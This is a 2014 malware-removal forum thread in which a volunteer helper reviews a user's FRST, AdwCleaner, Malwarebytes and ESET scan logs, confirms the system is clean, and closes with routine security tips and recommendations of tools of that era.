2014-11-10 23:18 - 2009-07-14 00:13 - 00782510 _____ () C:\windows\system32\PerfStringBackup.INI
2014-11-10 23:18 - 2009-07-13 23:45 - 00024608 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-10 23:18 - 2009-07-13 23:45 - 00024608 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-10 23:11 - 2013-09-24 08:33 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-10 23:10 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-11-10 19:30 - 2014-01-12 14:04 - 00004182 _____ () C:\windows\System32\Tasks\avast! Emergency Update
2014-11-10 17:55 - 2012-05-17 22:51 - 00000679 _____ () C:\Users\My Computer\Desktop\Settings.ini
2014-11-10 17:49 - 2014-10-10 11:37 - 00000000 ____D () C:\Users\My Computer\Desktop\New folder (2)
2014-11-09 00:05 - 2012-04-04 13:08 - 00000000 ____D () C:\Users\My Computer\AppData\Local\CrashDumps
2014-11-09 00:05 - 2012-03-18 21:01 - 00000000 ____D () C:\windows\Minidump
2014-11-08 23:31 - 2012-04-06 16:59 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-11-08 03:47 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\NDF
2014-11-06 20:54 - 2014-06-12 08:25 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-27 15:29 - 2014-06-12 08:16 - 00002154 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-24 18:28 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\rescache
2014-10-23 11:19 - 2013-09-24 08:33 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-23 11:19 - 2013-09-24 08:33 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-22 11:06 - 2011-11-02 07:01 - 00000000 ____D () C:\windows\SysWOW64\Macromed
2014-10-21 08:53 - 2012-05-02 18:59 - 01397728 _____ (Tweaking.com) C:\Users\My Computer\Desktop\TweakingRegistryBackup.exe
2014-10-18 11:03 - 2014-05-05 20:02 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-10-18 10:41 - 2012-02-20 16:40 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-18 10:34 - 2013-07-12 07:00 - 00000000 ____D () C:\windows\system32\MRT
2014-10-18 04:18 - 2012-03-04 22:01 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-17 18:14 - 2012-07-17 14:34 - 00003984 _____ () C:\windows\System32\Tasks\PC Checkup 3 Weekly Scan
2014-10-12 07:47 - 2011-11-02 07:01 - 00000000 ____D () C:\ProgramData\Adobe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-10 21:11

==================== End Of Log ============================

Hi wingeater,

Log is looking good. :bigthumb: Please provide an update on the computer's performance and any issues you still are experiencing.

=========================

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) Re- run AdwCleaner

It should be on your desktop

Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

Click on the Scan button.
AdwCleaner will begin to scan your computer like it did before.
After the scan has finished...
This time, click on the Clean button.
Press OK when asked to close all programs and follow the onscreen prompts.
Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
After rebooting, a log file report (AdwCleaner[S1].txt) will open automatically.
Copy and paste the contents of that log file in your next reply.
A copy of that log file will also be saved in the C:\AdwCleaner folder.

=========================

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) Malwarebytes' Anti-Malware

Download Malwarebytes' Anti-Malware (http://www.malwarebytes.org/mbam-download.php) (save it to your desktop).


Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

Select Scan tab.
http://i1269.photobucket.com/albums/jj590/OCD-WTT/MBAMDashboard_zpsddef9b5f.gif (http://s1269.photobucket.com/user/OCD-WTT/media/MBAMDashboard_zpsddef9b5f.gif.html)
Select type of scan to perform:
http://i1269.photobucket.com/albums/jj590/OCD-WTT/MBAMScanTab_zps2c5e74bd.gif (http://s1269.photobucket.com/user/OCD-WTT/media/MBAMScanTab_zps2c5e74bd.gif.html)

Threat Scan < --- Select this type of scan
Custom Scan
Hyper Scan

Next click the Scan button.
When the scan is complete, if no malicious items are found you can close the program.
If malicious items are found be sure that everything is checked, and click Quarantine .
When completed, a log will open in Notepad. Please save it to a convenient location and post the results.
Note: If you receive a notice that some of the items couldn't be removed, that they have been added to the delete on reboot list, please reboot.

=========================

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) ESET Online Scanner

*Note:

It is recommended to disable on-board antivirus program and anti-spyware programs while performing scans so there are no conflicts and it will speed up scan time.
Please don't go surfing while your resident protection is disabled!
Once the scan is finished remember to re-enable your antivirus along with your anti-spyware programs.

** You need to run your browser with Administrator Rights, to do so right click your browsers short cut and select "Run as Administrator".

= = = = = = = = = = = = = = = = = = = =

Go here to run ESET Online Scanner (http://www.eset.eu/online-scanner)

(Note: You can use Internet Explorer or FireFox for this scan. If you use FireFox you will be asked to install an additional component. Please allow this.)


Tick the box next to YES, I accept the Terms of Use.
Click Start
When asked, allow the activex control to install
Disable your Antivirus software. You can usually do this with its Notification Tray icon near the clock
Click Start
Make sure that the option "Remove found threats" is Checked, and the option "Scan unwanted applications" is Checked.
Click Scan.
Wait for the scan to finish.
When the scan completes, click List of found threats
click Export to Text file and save the file to your desktop using a unique name, such as ESETScan.
Include the contents of this report in your next reply

Note - when ESET doesn't find any threats, no report will be created.
Push the back button.
Push Finish
Re-enable your Antivirus software.

=========================

In your next post please provide the following:


AdwCleaner[S1].txt
MBAM log
ESET's log.txt
How's the computer running, any symptoms?

# AdwCleaner v4.101 - Report created 11/11/2014 at 12:33:11
# Updated 09/11/2014 by Xplode
# Database : 2014-11-10.9 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : My Computer - MYCOMPUTER-PC
# Running from : C:\Users\My Computer\Downloads\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****


***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344


-\\ Google Chrome v38.0.2125.111


-\\ Chromium v


*************************

AdwCleaner[R0].txt - [8693 octets] - [10/11/2014 19:37:06]
AdwCleaner[R1].txt - [904 octets] - [11/11/2014 12:28:54]
AdwCleaner[S0].txt - [8837 octets] - [10/11/2014 19:39:51]
AdwCleaner[S1].txt - [826 octets] - [11/11/2014 12:33:11]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [885 octets] ##########




Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/11/2014
Scan Time: 1:32:11 PM
Logfile: mam.txt
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.11.11.07
Rootkit Database: v2014.11.10.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: My Computer

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 321210
Time Elapsed: 14 min, 12 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)






C:\Users\All Users\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric.zip Win32/Bagle.gen.zip worm
C:\Users\All Users\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric1.zip Win32/Bagle.gen.zip worm
C:\Users\All Users\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric2.zip Win32/Bagle.gen.zip worm
C:\Users\All Users\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric3.zip Win32/Bagle.gen.zip worm
C:\Users\All Users\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric4.zip Win32/Bagle.gen.zip worm
C:\Users\All Users\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric5.zip Win32/Bagle.gen.zip worm
C:\ProgramData\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric.zip Win32/Bagle.gen.zip worm cleaned by deleting - quarantined
C:\ProgramData\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric1.zip Win32/Bagle.gen.zip worm cleaned by deleting - quarantined
C:\ProgramData\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric2.zip Win32/Bagle.gen.zip worm cleaned by deleting - quarantined
C:\ProgramData\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric3.zip Win32/Bagle.gen.zip worm cleaned by deleting - quarantined
C:\ProgramData\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric4.zip Win32/Bagle.gen.zip worm cleaned by deleting - quarantined
C:\ProgramData\Spybot - Search & Destroy\Recovery\SmitfraudCgeneric5.zip Win32/Bagle.gen.zip worm cleaned by deleting - quarantined

Hi wingeater,

How is the computer running, any remaining issues?

I haven't noticed any issues. Certainly haven't seen the dllhost.exe issue occurring anymore.

Hi wingeater,

Your log appears to be clean.
We have a few items to take care of before we get to the All Clean Speech.

= = = = = = = = = = = = = = = = = = = =

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) Remove Disinfection Tools


Download Delfix (http://general-changelog-team.fr/fr/downloads/finish/20-outils-de-xplode/9-delfix)
Tick the following boxes:

Remove disinfection tools
Create registry backup
Purge system restore


http://i1269.photobucket.com/albums/jj590/OCD-WTT/Delfix_zpsbce6c60b.gif (http://s1269.photobucket.com/user/OCD-WTT/media/Delfix_zpsbce6c60b.gif.html)


Click Run
Any other tools and files found can simply be deleted or uninstall via the Control Panel.

= = = = = = = = = = = = = = = = = = = =


With the above items taken care of let's move on to the All Clean part of the process.

The following procedures are recommendations for helping to keep your system running smoothly. If you are currently satisfied with how your system is running some or all of these may not pertain to you. Implement what you need.

This infection appears to have been cleaned, but I can not give you any absolute guarantees. As a precaution, I would go ahead and change all of your passwords as this is especially important after an infection.

Any of the logs that you created for use in the forums or remaining tools that have not yet been removed can be deleted so they aren't cluttering up your desktop.

Here are some tips to reduce the potential for spyware infection in the future:

Make your Internet Explorer more secure - This can be done by following these simple instructions:

From within Internet Explorer click on the Tools menu and then click on Options.
Click once on the Security tab
Click once on the Internet icon so it becomes highlighted.
Click once on the Custom Level button.
Change the Download signed ActiveX controls to Prompt
Change the Download unsigned ActiveX controls to Disable
Change the Initialize and script ActiveX controls not marked as safe to Disable
Change the Launching programs and files in an IFRAME to Prompt
Change the Navigate windows and frames across different domains to Prompt
When all these settings have been made, click on the OK button.
If it prompts you as to whether or not you want to save the settings, press the Yes button.
Next press the Apply button and then the OK to exit the Internet Properties page.
Make your Mozilla Firefox more secure - This can be done by adding these add-ons:


NoScript (https://addons.mozilla.org/en-US/firefox/addon/noscript/?src=ss)
AdBlockPlus (https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/)

Use and update an anti-virus software - I can not overemphasize the need for you to use and update your anti-virus application on a regular basis. With the ever increasing number of new variants of malware arriving on the scene daily, you become very susceptible to an attack without updated protection.

Free Anti-Virus

Avast Free Antivirus (http://download.cnet.com/Avast-Free-Antivirus/3000-2239_4-10019223.html)
Avira Free Antivirus 2013 (http://download.cnet.com/Avira-Free-Antivirus-2013/3000-2239_4-10322935.html)
PC Tools AntiVirus Free (http://download.cnet.com/PC-Tools-AntiVirus-Free/3000-2239_4-10625067.html)
Ad-Aware Free Antivirus + (http://download.cnet.com/Ad-Aware-Free-Antivirus/3000-8022_4-10045910.html)

Free Firewall
Using a third-party firewall will allow you to give/deny access for applications that want to go online. Without a firewall your computer is susceptible to being hacked and taken over. Simply using a firewall in its default configuration can lower your risk greatly. A tutorial on firewalls can be found here (http://www.bleepingcomputer.com/tutorials/understanding-and-using-firewalls/).

Online Armor Free (http://download.cnet.com/Online-Armor-Free/3000-10435_4-10426782.html)
Agnitum Outpost Firewall Free (http://download.cnet.com/Agnitum-Outpost-Firewall-Free/3000-10435_4-10913746.html)
Comodo Firewall (http://download.cnet.com/Comodo-Firewall/3000-10435_4-75181464.html)

= = = = = = = = = = = = = = = = = = = =

Be prepared for CryptoLocker:

Cryptolocker Ransomware: What You Need To Know (http://blog.malwarebytes.org/intelligence/2013/10/cryptolocker-ransomware-what-you-need-to-know/#)
CryptoLocker Ransomware Information Guide and FAQ (http://www.bleepingcomputer.com/virus-removal/cryptolocker-ransomware-information)

to help protect your computer in the future I recommend that you get the following free program:

CryptoPrevent (http://www.foolishit.com/vb6-projects/cryptoprevent/) install this program to lock down and prevent crypto-ransomeware

http://i1269.photobucket.com/albums/jj590/OCD-WTT/CryptoPrevent_zps7ddc3ebd.jpg (http://s1269.photobucket.com/user/OCD-WTT/media/CryptoPrevent_zps7ddc3ebd.jpg.html)

= = = = = = = = = = = = = = = = = = = =

COMPUTER SECURITY (http://www.malwareremoval.com/forum/viewtopic.php?p=557960#p557960) - a short guide to staying safer online

= = = = = = = = = = = = = = = = = = = =

WOT (http://www.mywot.com/) Web of Trust, warns you about risky websites that try to scam visitors, deliver malware or send spam. Protect your computer against online threats by using WOT as your front-line layer of protection when browsing or searching in unfamiliar territory. WOT's color-coded icons show you ratings for 21 million websites - green to go, yellow for caution and red to stop, helping you avoid the dangerous sites. WOT has an addon available for both Firefox and IE.

Green should be good to go
Yellow for caution
Red to stop

= = = = = = = = = = = = = = = = = = = =

P2P may be a great way to get lots of stuffs, but it is a great way to get infected as well. There's no way to tell if the file being shared is infected. Worse still, some worms spread via P2P networks, infecting you as well.

Please read these short reports on the dangers of peer-2-peer programs and file sharing.

FBI Cyber Education Letter (http://www.fbi.gov/cyberinvest/cyberedletter.htm)
USAToday (http://www.usatoday.com/tech/columnist/kimkomando/2006-04-13-file-sharing-woes_x.htm)
infoworld (http://www.infoworld.com/article/07/09/06/Seattle-man-arrested-for-p-to-p-ID-theft_1.html)


= = = = = = = = = = = = = = = = = = = =

Make sure you keep your Windows OS current.

Windows XP:
Microsoft will no longer offer support for Windows XP beginning on April 8, 2014
If you are running Windows XP, please take the time to read the information provided at these links.

Windows XP - The Elephant In The Room (http://www.malwareremoval.com/forum/viewtopic.php?p=630064#p630064)
Windows XP - The end of the road (http://techpageone.dell.com/technology/windows-xp-end-road/?dgc=BA&cid=272099&lid=5049884&acd=12309189674467600#.UxUoP4W9Is3)

Windows Vista/7 users can open the Start menu > All Programs > Windows Update > Check for Updates (in left hand task pane) to update these systems.
Window 8 Open Windows Update by swiping in from the right edge of the screen (or, if you're using a mouse, pointing to the lower-right corner of the screen and moving the mouse pointer up), tapping or clicking Settings, tapping or clicking Change PC settings, and then tapping or clicking Update and recovery.

Without these you are leaving the back door open.

= = = = = = = = = = = = = = = = = = = =

Consider a custom hosts file such as MVPS HOSTS (http://www.mvps.org/winhelp2002/hosts.htm). This custom hosts file effectively blocks a wide range of unwanted ads, banners, 3rd party Cookies, 3rd party page counters, web bugs, and many hijackers. For information on how to download and install, please read this tutorial by WinHelp2002 (http://www.mvps.org/winhelp2002/hosts.htm)
Note: Be sure to follow the instructions to disable the DNS Client service before installing a custom hosts file.

= = = = = = = = = = = = = = = = = = = =

Finally, I strongly recommend that you read TonyKlein's good advice So how did I get infected in the first place? (http://www.geekstogo.com/forum/index.php?autocom=custom&page=How_did_I)

Please reply to this thread once more if you are satisfied so that we can mark the problem as resolved.

Since this issue appears to be resolved ... this Topic has been closed.

If you still require help, please start a new topic and include fresh FRST and aswMBR logs, along with a link to your previous thread.

Please do not add any logs that might have been requested previously, you would be starting fresh.

Applies only to the original poster, anyone else with similar problems please start your own topic.

--------------------------------

Admin Edit
Thank you OCD. :-)